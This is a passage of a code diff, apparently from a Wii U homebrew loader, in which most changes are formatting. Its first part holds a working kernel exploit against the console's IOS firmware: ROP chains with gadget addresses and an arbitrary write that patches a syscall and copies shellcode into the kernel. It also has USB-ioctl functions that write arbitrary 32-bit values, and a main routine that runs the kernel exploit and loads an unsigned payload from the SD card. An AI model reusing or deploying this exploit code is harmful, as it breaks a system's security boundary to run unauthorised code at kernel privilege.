MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x64 + 0x0, // 0x68 + 0x1012EE64, // 0x6C set_panic_behavior (arbitrary write) + 0x0, // 0x70 + 0x0, // 0x74 + 0x10123a9f, // 0x78 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x04, // 0x7C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A04000, // 0x80 value: MOV R4, R0 + 0x0, // 0x84 + 0x10123a8b, // 0x88 POP {R3,R4,PC} + 0x1, // 0x8C R3 must be 1 for the arbitrary write + 0x0, // 0x90 + 0x1010CD18, // 0x94 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x98 + 0x0, // 0x9C + 0x1012EE64, // 0xA0 set_panic_behavior (arbitrary write) + 0x0, // 0xA4 + 0x0, // 0xA8 + 0x10123a9f, // 0xAC POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x08, // 0xB0 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE3E00000, // 0xB4 value: MOV R0, #0xFFFFFFFF + 0x0, // 0xB8 + 0x10123a8b, // 0xBC POP {R3,R4,PC} + 0x1, // 0xC0 R3 must be 1 for the arbitrary write + 0x0, // 0xC4 + 0x1010CD18, // 0xC8 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0xCC + 0x0, // 0xD0 + 0x1012EE64, // 0xD4 set_panic_behavior (arbitrary write) + 0x0, // 0xD8 + 0x0, // 0xDC + 0x10123a9f, // 0xE0 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x0C, // 0xE4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE030F10, // 0xE8 value: MCR P15, #0, R0, C3, C0, #0 (set dacr to R0) + 0x0, // 0xEC + 0x10123a8b, // 0xF0 POP {R3,R4,PC} + 0x1, // 0xF4 R3 must be 1 for the arbitrary write + 0x0, // 0xF8 + 0x1010CD18, // 0xFC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x100 + 0x0, // 0x104 + 0x1012EE64, // 0x108 set_panic_behavior (arbitrary write) + 0x0, // 0x10C + 0x0, // 0x110 + 0x10123a9f, // 0x114 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x10, // 0x118 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A00004, // 0x11C value: MOV R0, R4 + 0x0, // 0x120 + 0x10123a8b, // 0x124 POP {R3,R4,PC} + 0x1, // 0x128 R3 must be 1 for the arbitrary write + 0x0, // 0x12C + 0x1010CD18, // 0x130 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x134 + 0x0, // 0x138 + 0x1012EE64, // 0x13C set_panic_behavior (arbitrary write) + 0x0, // 0x140 + 0x0, // 0x144 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x14, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE12FFF33, // 0x150 value: BLX R3 KERNEL_MEMCPY + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x18, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0x00000000, // 0x150 value: NOP + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x1C, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE17FF7A, // 0x150 value: clean_loop: MRC p15, 0, r15, c7, c10, 3 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x20, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0x1AFFFFFD, // 0x150 value: BNE clean_loop + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x148 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x24, // 0x14C address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xEE070F9A, // 0x150 value: MCR p15, 0, R0, c7, c10, 4 + 0x0, // 0x154 + 0x10123a8b, // 0x158 POP {R3,R4,PC} + 0x1, // 0x15C R3 must be 1 for the arbitrary write + 0x0, // 0x160 + 0x1010CD18, // 0x164 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x168 + 0x0, // 0x16C + 0x1012EE64, // 0x170 set_panic_behavior (arbitrary write) + 0x0, // 0x174 + 0x0, // 0x178 + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x28, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE1A03004, // 0x184 value: MOV R3, R4 + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x17C POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x2C, // 0x180 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE8BD4010, // 0x184 value: POP {R4,LR} + 0x0, // 0x188 + 0x10123a8b, // 0x18C POP {R3,R4,PC} + 0x1, // 0x190 R3 must be 1 for the arbitrary write + 0x0, // 0x194 + 0x1010CD18, // 0x198 MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x19C + 0x0, // 0x1A0 + 0x1012EE64, // 0x1A4 set_panic_behavior (arbitrary write) + 0x0, // 0x1A8 + 0x0, // 0x1AC + 0x10123a9f, // 0x1B0 POP {R0,R1,R4,PC} + REPLACE_SYSCALL + 0x30, // 0x1B4 address: the beginning of syscall_0x1a (IOS_GetUpTime64) + 0xE12FFF13, // 0x1B8 value: BX R3 our code :-) + 0x0, // 0x1BC + 0x10123a8b, // 0x1C0 POP {R3,R4,PC} + 0x1, // 0x1C4 R3 must be 1 for the arbitrary write + 0x0, // 0x1C8 + 0x1010CD18, // 0x1CC MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x1D0 + 0x0, // 0x1D4 + 0x1012EE64, // 0x1D8 set_panic_behavior (arbitrary write) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + REPLACE_SYSCALL, // 0x1DC start of syscall IOS_GetUpTime64 + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + ARM_CODE_BASE, // 0x1E8 our code destination address + 0x0, // 0x1EC + 0x0, // 0x1F0 + 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} + 0x0, // 0x1F8 + sizeof(ios_kernel_bin), // 0x1FC our code size + 0x0, // 0x200 + 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} + 0x00140000, // 0x208 our code source location + 0x08131D04, // 0x20C KERNEL_MEMCPY address + 0x0, // 0x210 + 0x0, // 0x214 + 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x0, + 0x0, + 0x101312D0, }; static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x00130000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} - 0x0, - 0x0, - 0x0, - 0x00110000 - 0x44, // 0x8C - 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} - 0x0, - 0x0, - 0x1012EA68, // 0xAC stack pivot + 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} + CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination + 0x0, // 0x08 + 0x0, // 0x0C + 0x101063db, // 0x10 POP {R1,R2,R5,PC} + 0x00130000, // 0x14 source + sizeof(final_chain), // 0x18 length + 0x0, // 0x1C + 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x101236f3, // 0x2C POP {R1-R7,PC} + 0x0, // 0x30 arg + 0x101001DC, // 0x34 stackptr + 0x68, // 0x38 stacksize + 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x40 + 0x0, // 0x44 + 0x0, // 0x48 + 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x50 + 0x0, // 0x54 + 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x5C + 0x0, // 0x60 + IOS_CREATETHREAD, // 0x64 + 0x1, // 0x68 priority + 0x2, // 0x6C flags + 0x0, // 0x70 + 0x0, // 0x74 + 0x101063db, // 0x78 POP {R1,R2,R5,PC} + 0x0, // 0x7C + -(0x240 + 0x18 + 0xF000), // 0x80 stack offset + 0x0, // 0x84 + 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} + 0x0, + 0x0, + 0x0, + 0x00110000 - 0x44, // 0x8C + 0x00110010, // 0x90 + 0x0, // 0x94 + 0x0, // 0x98 + 0x0, // 0x9C + 0x0, // 0xA0 + 0x0, // 0xA4 + 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack + 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} + 0x0, + 0x0, + 0x1012EA68, // 0xAC stack pivot }; static void uhs_exploit_init(int dev_uhs_0_handle) { ayylmao[5] = 1; ayylmao[8] = 0x500000; - memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain)); - memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain)); - memcpy((char*)(0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin)); + memcpy((char *) (0xF4120000), second_chain, sizeof(second_chain)); + memcpy((char *) (0xF4130000), final_chain, sizeof(final_chain)); + memcpy((char *) (0xF4140000), ios_kernel_bin, sizeof(ios_kernel_bin)); - payload_info_t *payloads = (payload_info_t*)0xF4148000; + payload_info_t *payloads = (payload_info_t *) 0xF4148000; payloads->size = sizeof(ios_usb_bin); memcpy(payloads->data, ios_usb_bin, payloads->size); @@ -319,24 +320,24 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { pretend_root_hub[78] = 0; DCStoreRange(pretend_root_hub + 33, 200); - DCStoreRange((void*)0xF4120000, sizeof(second_chain)); - DCStoreRange((void*)0xF4130000, sizeof(final_chain)); - DCStoreRange((void*)0xF4140000, sizeof(ios_kernel_bin)); - DCStoreRange((void*)0xF4148000, ((uint32_t)0xF4180000) - 0xF4148000); + DCStoreRange((void *) 0xF4120000, sizeof(second_chain)); + DCStoreRange((void *) 0xF4130000, sizeof(final_chain)); + DCStoreRange((void *) 0xF4140000, sizeof(ios_kernel_bin)); + DCStoreRange((void *) 0xF4148000, ((uint32_t) 0xF4180000) - 0xF4148000); } static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) OSSleepTicks(0x200000); //! Improves stability - int request_buffer[] = { -(0xBEA2C), val }; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 + int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); } int ExecuteIOSExploit() { int iosuhaxFd = IOS_Open("/dev/iosuhax", 0); - if(iosuhaxFd >= 0) { + if (iosuhaxFd >= 0) { int dummy = 0; IOS_Ioctl(iosuhaxFd, 0x03, &dummy, sizeof(dummy), &dummy, sizeof(dummy)); @@ -349,7 +350,7 @@ int ExecuteIOSExploit() { //! execute exploit int dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0); - if(dev_uhs_0_handle < 0) { + if (dev_uhs_0_handle < 0) { return dev_uhs_0_handle; } diff --git a/source/main.cpp b/source/main.cpp index 1f9335a..664c892 100644 --- a/source/main.cpp +++ b/source/main.cpp @@ -27,6 +27,7 @@ #include "ios_exploit.h" #include "gx2sploit.h" + #ifdef __cplusplus extern "C" { #endif @@ -37,20 +38,20 @@ extern "C" { bool CheckRunning() { - switch(ProcUIProcessMessages(true)) { - case PROCUI_STATUS_EXITING: { - return false; - } - case PROCUI_STATUS_RELEASE_FOREGROUND: { - ProcUIDrawDoneRelease(); - break; - } - case PROCUI_STATUS_IN_FOREGROUND: { - break; - } - case PROCUI_STATUS_IN_BACKGROUND: - default: - break; + switch (ProcUIProcessMessages(true)) { + case PROCUI_STATUS_EXITING: { + return false; + } + case PROCUI_STATUS_RELEASE_FOREGROUND: { + ProcUIDrawDoneRelease(); + break; + } + case PROCUI_STATUS_IN_FOREGROUND: { + break; + } + case PROCUI_STATUS_IN_BACKGROUND: + default: + break; } return true; } @@ -69,29 +70,29 @@ int main(int argc, char **argv) { uint32_t btn = vpad_data.hold | vpad_data.trigger; bool loadWithoutHacks = false; bool kernelDone = false; - if((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) { + if ((btn & VPAD_BUTTON_ZR) == VPAD_BUTTON_ZR) { loadWithoutHacks = true; } - if((btn & VPAD_BUTTON_ZL) == VPAD_BUTTON_ZL) { + if ((btn & VPAD_BUTTON_ZL) == VPAD_BUTTON_ZL) { // In case that fopen check is not working... WHBLogPrintf("Force kernel exploit"); kernelDone = true; DoKernelExploit(); } - if(!kernelDone) { - if(fopen("fs:/vol/external01/wiiu/payload.elf", "r") != NULL) { + if (!kernelDone) { + if (fopen("fs:/vol/external01/wiiu/payload.elf", "r") != NULL) { WHBLogPrintf("We need the kernel exploit to load the payload"); DoKernelExploit(); } } - if(!loadWithoutHacks) { + if (!loadWithoutHacks) { uint32_t entryPoint = load_loader_elf_from_sd(0, "wiiu/payload.elf"); - if(entryPoint != 0) { + if (entryPoint != 0) { WHBLogPrintf("New entrypoint: %08X", entryPoint); - int res = ((int (*)(int, char **))entryPoint)(argc, argv); - if(res > 0) { + int res = ((int (*)(int, char **)) entryPoint)(argc, argv); + if (res > 0) { WHBLogPrintf("Returning..."); WHBLogUdpDeinit(); return 0; @@ -103,20 +104,20 @@ int main(int argc, char **argv) { ProcUIInit(OSSavesDone_ReadyToRelease); DEBUG_FUNCTION_LINE("ProcUIInit done"); - if(loadWithoutHacks) { + if (loadWithoutHacks) { DEBUG_FUNCTION_LINE("Load system menu"); // Restore the default title id to the normal wii u menu. unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0); - memcpy((void*)0xF417FFF0, &sysmenuIdUll, 8); - DCStoreRange((void*)0xF417FFF0,0x8); + memcpy((void *) 0xF417FFF0, &sysmenuIdUll, 8); + DCStoreRange((void *) 0xF417FFF0, 0x8); - DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n",sysmenuIdUll); + DEBUG_FUNCTION_LINE("THIS IS A TEST %016llX\n", sysmenuIdUll); ExecuteIOSExploit(); SYSLaunchMenu(); } - while(CheckRunning()) { + while (CheckRunning()) { // wait. OSSleepTicks(OSMillisecondsToTicks(100)); } diff --git a/source/utils/StringTools.cpp b/source/utils/StringTools.cpp index ec7cf68..d5c366f 100644 --- a/source/utils/StringTools.cpp +++ b/source/utils/StringTools.cpp @@ -36,13 +36,13 @@ #include -BOOL StringTools::EndsWith(const std::string& a, const std::string& b) { +BOOL StringTools::EndsWith(const std::string &a, const std::string &b) { if (b.size() > a.size()) return false; return std::equal(a.begin() + a.size() - b.size(), a.end(), b.begin()); } -const char * StringTools::byte_to_binary(int32_t x) { +const char *StringTools::byte_to_binary(int32_t x) { static char b[9]; b[0] = '\0'; @@ -54,25 +54,25 @@ const char * StringTools::byte_to_binary(int32_t x) { return b; } -std::string StringTools::removeCharFromString(std::string& input,char toBeRemoved) { +std::string StringTools::removeCharFromString(std::string &input, char toBeRemoved) { std::string output = input; size_t position; - while(1) { + while (1) { position = output.find(toBeRemoved); - if(position == std::string::npos) + if (position == std::string::npos) break; output.erase(position, 1); } return output; } -const char * StringTools::fmt(const char * format, ...) { +const char *StringTools::fmt(const char *format, ...) { static char strChar[512]; strChar[0] = 0; va_list va; va_start(va, format); - if((vsprintf(strChar, format, va) >= 0)) { + if ((vsprintf(strChar, format, va) >= 0)) { va_end(va); return (const char *) strChar; } @@ -81,26 +81,26 @@ const char * StringTools::fmt(const char * format, ...) { return NULL; } -const wchar_t * StringTools::wfmt(const char * format, ...) { +const wchar_t *StringTools::wfmt(const char *format, ...) { static char tmp[512]; static wchar_t strWChar[512]; strWChar[0] = 0; tmp[0] = 0; - if(!format) + if (!format) return (const wchar_t *) strWChar; - if(strcmp(format, "") == 0) + if (strcmp(format, "") == 0) return (const wchar_t *) strWChar; va_list va; va_start(va, format); - if((vsprintf(tmp, format, va) >= 0)) { - int bt; + if ((vsprintf(tmp, format, va) >= 0)) { + int bt; int32_t strlength = strlen(tmp); - bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512 ); + bt = mbstowcs(strWChar, tmp, (strlength < 512) ? strlength : 512); - if(bt > 0) { + if (bt > 0) { strWChar[bt] = 0; return (const wchar_t *) strWChar; } @@ -110,14 +110,14 @@ const wchar_t * StringTools::wfmt(const char * format, ...) { return NULL; } -int32_t StringTools::strprintf(std::string &str, const char * format, ...) { +int32_t StringTools::strprintf(std::string &str, const char *format, ...) { static char tmp[512]; tmp[0] = 0; int32_t result = 0; va_list va; va_start(va, format); - if((vsprintf(tmp, format, va) >= 0)) { + if ((vsprintf(tmp, format, va) >= 0)) { str = tmp; result = str.size(); } @@ -126,14 +126,14 @@ int32_t StringTools::strprintf(std::string &str, const char * format, ...) { return result; } -std::string StringTools::strfmt(const char * format, ...) { +std::string StringTools::strfmt(const char *format, ...) { std::string str; static char tmp[512]; tmp[0] = 0; va_list va; va_start(va, format); - if((vsprintf(tmp, format, va) >= 0)) { + if ((vsprintf(tmp, format, va) >= 0)) { str = tmp; } va_end(va); @@ -141,11 +141,11 @@ std::string StringTools::strfmt(const char * format, ...) { return str; } -BOOL StringTools::char2wchar_t(const char * strChar, wchar_t * dest) { - if(!strChar || !dest) +BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) { + if (!strChar || !dest) return false; - int bt; + int bt; bt = mbstowcs(dest, strChar, strlen(strChar)); if (bt > 0) { dest[bt] = 0; @@ -155,39 +155,39 @@ BOOL StringTools::char2wchar_t(const char * strChar, wchar_t * dest) { return false; } -int32_t StringTools::strtokcmp(const char * string, const char * compare, const char * separator) { - if(!string || !compare) +int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) { + if (!string || !compare) return -1; char TokCopy[512]; strncpy(TokCopy, compare, sizeof(TokCopy)); TokCopy[511] = '\0'; - char * strTok = strtok(TokCopy, separator); + char *strTok = strtok(TokCopy, separator); while (strTok != NULL) { if (strcasecmp(string, strTok) == 0) { return 0; } - strTok = strtok(NULL,separator); + strTok = strtok(NULL, separator); } return -1; } -int32_t StringTools::strextcmp(const char * string, const char * extension, char seperator) { - if(!string || !extension) +int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) { + if (!string || !extension) return -1; char *ptr = strrchr(string, seperator); - if(!ptr) + if (!ptr) return -1; return strcasecmp(ptr + 1, extension); } -std::vector StringTools::stringSplit(const std::string & inValue, const std::string & splitter) { +std::vector StringTools::stringSplit(const std::string &inValue, const std::string &splitter) { std::string value = inValue; std::vector result; while (true) { @@ -202,7 +202,7 @@ std::vector StringTools::stringSplit(const std::string & inValue, c result.push_back(""); break; } - if(index + splitter.size() > value.length()) { + if (index + splitter.size() > value.length()) { break; } value = value.substr(index + splitter.size(), value.length()); @@ -211,39 +211,39 @@ std::vector StringTools::stringSplit(const std::string & inValue, c } -const char * StringTools::FullpathToFilename(const char *path) { - if(!path) - return path; +const char *StringTools::FullpathToFilename(const char *path) { + if (!path) + return path; - const char * ptr = path; - const char * Filename = ptr; + const char *ptr = path; + const char *Filename = ptr; - while(*ptr != '\0') { - if(ptr[0] == '/' && ptr[1] != '\0') - Filename = ptr+1; + while (*ptr != '\0') { + if (ptr[0] == '/' && ptr[1] != '\0') + Filename = ptr + 1; - ++ptr; - } - - return Filename; + ++ptr; } + return Filename; +} + void StringTools::RemoveDoubleSlashs(std::string &str) { - uint32_t length = str.size(); + uint32_t length = str.size(); - //! clear path of double slashes - for(uint32_t i = 1; i < length; ++i) { - if(str[i-1] == '/' && str[i] == '/') { - str.erase(i, 1); - i--; - length--; - } + //! clear path of double slashes + for (uint32_t i = 1; i < length; ++i) { + if (str[i - 1] == '/' && str[i] == '/') { + str.erase(i, 1); + i--; + length--; } } +} // You must free the result if result is non-NULL. -char * StringTools::str_replace(char *orig, char *rep, char *with) { +char *StringTools::str_replace(char *orig, char *rep, char *with) { char *result; // the return string char *ins; // the next insert point char *tmp; // varies @@ -268,7 +268,7 @@ char * StringTools::str_replace(char *orig, char *rep, char *with) { ins = tmp + len_rep; } - tmp = result = (char*)malloc(strlen(orig) + (len_with - len_rep) * count + 1); + tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1); if (!result) return NULL; diff --git a/source/utils/StringTools.h b/source/utils/StringTools.h index 8087a70..851aa73 100644 --- a/source/utils/StringTools.h +++ b/source/utils/StringTools.h @@ -32,20 +32,33 @@ class StringTools { public: - static BOOL EndsWith(const std::string& a, const std::string& b); - static const char * byte_to_binary(int32_t x); - static std::string removeCharFromString(std::string& input,char toBeRemoved); - static const char * fmt(const char * format, ...); - static const wchar_t * wfmt(const char * format, ...); - static int32_t strprintf(std::string &str, const char * format, ...); - static std::string strfmt(const char * format, ...); - static BOOL char2wchar_t(const char * src, wchar_t * dest); - static int32_t strtokcmp(const char * string, const char * compare, const char * separator); - static int32_t strextcmp(const char * string, const char * extension, char seperator); + static BOOL EndsWith(const std::string &a, const std::string &b); + + static const char *byte_to_binary(int32_t x); + + static std::string removeCharFromString(std::string &input, char toBeRemoved); + + static const char *fmt(const char *format, ...); + + static const wchar_t *wfmt(const char *format, ...); + + static int32_t strprintf(std::string &str, const char *format, ...); + + static std::string strfmt(const char *format, ...); + + static BOOL char2wchar_t(const char *src, wchar_t *dest); + + static int32_t strtokcmp(const char *string, const char *compare, const char *separator); + + static int32_t strextcmp(const char *string, const char *extension, char seperator); + static char *str_replace(char *orig, char *rep, char *with); - static const char * FullpathToFilename(const char *path); + + static const char *FullpathToFilename(const char *path); + static void RemoveDoubleSlashs(std::string &str); - static std::vector stringSplit(const std::string & value, const std::string & splitter); + + static std::vector stringSplit(const std::string &value, const std::string &splitter); }; #endif /* __STRING_TOOLS_H */ diff --git a/source/utils/logger.h b/source/utils/logger.h index 400a353..9b5195f 100644 --- a/source/utils/logger.h +++ b/source/utils/logger.h @@ -1,4 +1,5 @@ #pragma once + #include #include diff --git a/source/utils/utils.c b/source/utils/utils.c index ad98bfb..0bd7516 100644 --- a/source/utils/utils.c +++ b/source/utils/utils.c @@ -7,31 +7,31 @@ #include "utils/logger.h" // https://gist.github.com/ccbrown/9722406 -void dumpHex(const void* data, size_t size) { +void dumpHex(const void *data, size_t size) { char ascii[17]; size_t i, j; ascii[16] = '\0'; WHBLogPrintf("0x%08X (0x0000): ", data); for (i = 0; i < size; ++i) { - WHBLogWritef("%02X ", ((unsigned char*)data)[i]); - if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { - ascii[i % 16] = ((unsigned char*)data)[i]; + WHBLogWritef("%02X ", ((unsigned char *) data)[i]); + if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') { + ascii[i % 16] = ((unsigned char *) data)[i]; } else { ascii[i % 16] = '.'; } - if ((i+1) % 8 == 0 || i+1 == size) { + if ((i + 1) % 8 == 0 || i + 1 == size) { WHBLogWritef(" "); - if ((i+1) % 16 == 0) { + if ((i + 1) % 16 == 0) { WHBLogWritef("| %s \n", ascii); - if(i + 1 < size) { - DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1,i+1); + if (i + 1 < size) { + DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1); } - } else if (i+1 == size) { - ascii[(i+1) % 16] = '\0'; - if ((i+1) % 16 <= 8) { + } else if (i + 1 == size) { + ascii[(i + 1) % 16] = '\0'; + if ((i + 1) % 16 <= 8) { WHBLogWritef(" "); } - for (j = (i+1) % 16; j < 16; ++j) { + for (j = (i + 1) % 16; j < 16; ++j) { WHBLogWritef(" "); } WHBLogWritef("| %s \n", ascii); diff --git a/source/utils/utils.h b/source/utils/utils.h index 155015b..a502522 100644 --- a/source/utils/utils.h +++ b/source/utils/utils.h @@ -7,12 +7,12 @@ extern "C" { #endif -#define LIMIT(x, min, max) \ - ({ \ - typeof( x ) _x = x; \ - typeof( min ) _min = min; \ - typeof( max ) _max = max; \ - ( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \ +#define LIMIT(x, min, max) \ + ({ \ + typeof( x ) _x = x; \ + typeof( min ) _min = min; \ + typeof( max ) _max = max; \ + ( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \ }) #define DegToRad(a) ( (a) * 0.01745329252f ) @@ -31,7 +31,7 @@ extern "C" { #define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32))) //Needs to have log_init() called beforehand. -void dumpHex(const void* data, size_t size); +void dumpHex(const void *data, size_t size); #ifdef 